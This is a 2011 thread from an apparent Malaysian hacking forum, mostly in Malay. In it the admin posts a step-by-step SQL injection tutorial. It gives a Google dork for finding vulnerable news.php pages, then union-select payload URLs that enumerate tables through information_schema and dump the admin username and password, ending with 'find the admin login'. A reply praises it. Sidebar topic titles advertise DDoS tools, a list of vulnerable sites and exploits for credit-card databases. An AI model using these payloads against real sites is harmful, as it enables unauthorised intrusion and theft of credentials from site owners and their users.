Malaysian WackWall Forum

Now Malaysian Can Connect Over The World
 
HomePortalCalendarGalleryFAQSearchMemberlistUsergroupsRegisterLog in
Navigation
:: Portal ::
:: Forum ::
 :: Memberlist ::
:: Profile ::
:: FAQ ::
:: Search ::


AlertPay Easy Money Transfer 100% Free to register
 
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Google Translator
Latest topics
» IRC Flooder Script For Sale
Mon Oct 08, 2012 12:39 am by maxi.y.mateo

» utusan.com.my Being DDOS
Fri Jan 20, 2012 5:33 pm by Penjejak Badai

» PHP IRC Bot
Fri Dec 02, 2011 11:31 am by siperda

» SQL Injection Scanner By XShimeX
Mon Oct 24, 2011 6:22 pm by sucide_bomber

» Website Vulnerable Scanner Tools V1.01 By proqrammer
Mon Oct 24, 2011 6:21 pm by sucide_bomber

» Slowloris or XerXes Leak Version
Tue Sep 13, 2011 7:45 pm by sucide_bomber

» maisarah wuz here
Tue Sep 13, 2011 7:32 pm by sucide_bomber

» Sql Injection Tutorial
Tue Jul 19, 2011 2:56 pm by sucide_bomber

» XerXes Source Codes!!
Wed Jul 13, 2011 8:55 am by wackwall

» SQL Injection dalam bahasa Malaysia
Thu Jun 30, 2011 9:11 pm by sucide_bomber

» LFI Scanner ( Perl )
Mon Jun 27, 2011 8:21 am by wackwall

» Muhasabah diri tingkat kesyukuran, keinsafan umat
Mon Jun 27, 2011 3:56 am by sucide_bomber

» 5013 Webs With SQL Vuln
Mon Jun 27, 2011 3:50 am by sucide_bomber

» Saya mencari part time job online?
Mon Jun 27, 2011 1:19 am by sucide_bomber

» 16 exploits for hacking CC databases
Mon Jun 13, 2011 1:33 pm by sucide_bomber

Link Exchange
Online News


















Churp2x Campaign
Click Pada Iklan DiBawah & Dapatkan Ganjaran Anda
SEKARANG!



















Mangga Ads
NuffNang Ads

Share | 
 

 Sql Injection Tutorial

Go down 
AuthorMessage
wackwall
Admin
avatar

Zodiac : Cancer Chinese zodiac : Rooster
Posts : 159
Points : 3335
Reputation : 2
Join date : 10/12/2010
Age : 37
Location Location : Sarawak

PostSubject: Sql Injection Tutorial   Mon Jul 04, 2011 3:19 pm

here we go...

[You must be registered and logged in to see this image.]


Sql Injection Tutorial
>>Info<<

Kata kunci yang perlu diketahui
-------------------------------
karakter: ', -
comments: /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x


Google Dork yang akan di gunakan ialah "inurl:news.php?id="

Langkah Pertama

[site]/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.

contoh:

code:

[site]/news.php?id=1'
atau
[site]/news.php?id=-1

contoh error:
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

Langkah Kedua

Cari jumlah table yang ada di dalam database.
----tambahkan +order+by+1-- diakhir url

Contoh:

Code:
[site]/news.php?id=1+order+by+1--
atau
[site]/news.php?id=1+order+by+1/* periksa secara bepringkat
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*cari sehingga error keluar

untuk tutorial ini jumlah table yg diperolehi ialah 3.

Langkah Ketiga

Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
-----perintah yang akan digunakan: union+select+1,2,3--

Contoh: angka 2 keluar.

kemudian kita masukkan version() di angka 2,

contoh:

[site]/news.php?id=1+union+select+1,version(),3--

dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log

------
|info|
------

database() = untuk lihat name database yang digunakan
version() = untuk lihat version msql yang digunakan

Langkah Keempat

untuk nampakkan nama2 table yang ada di wenb tersebut, perintah

Table_name ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.

contoh:

[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--

Langkah KeLima

Keluarkan kesemua isi yang ada di dalam table tersebut,

group_concat(table_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables+where+table_schema=database() ---> Masukan selepas angka yang terakhir.

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--

Langkah Ke Enam

Keluar kan kandungan yang ada didalam TABLE

group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHEXA--
|
|
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)


------
|info|
------

Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> [You must be registered and logged in to see this link.]
-----> [You must be registered and logged in to see this link.]

Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E

Contoh:

[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--

Langkah Ketujuh

Keluarkan hasil isi yang kita berjaya peroleh dari table ADMIN

concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column

Contoh:

[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--

Dan kita akan peroleh username dan password admin untuk website tersebut.

Langkah Terakhir:

Cari Login untuk admin..


Selamat Mencuba.....


Source : [You must be registered and logged in to see this link.]
Back to top Go down
View user profile http://malaysia.1talk.net
sucide_bomber
New User
New User
avatar

Posts : 23
Points : 2767
Reputation : 0
Join date : 20/05/2011
Location Location : l4nd 0f h34d hunt3r

PostSubject: Re: Sql Injection Tutorial   Tue Jul 19, 2011 2:56 pm

Twisted Evil r0x...thanks MASTER...dah lama tunggu..akhirnya dapat juga tutorial ni...
Back to top Go down
View user profile
 
Sql Injection Tutorial
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Malaysian WackWall Forum :: Internet :: h4ck3d :: Tutorials-
Jump to: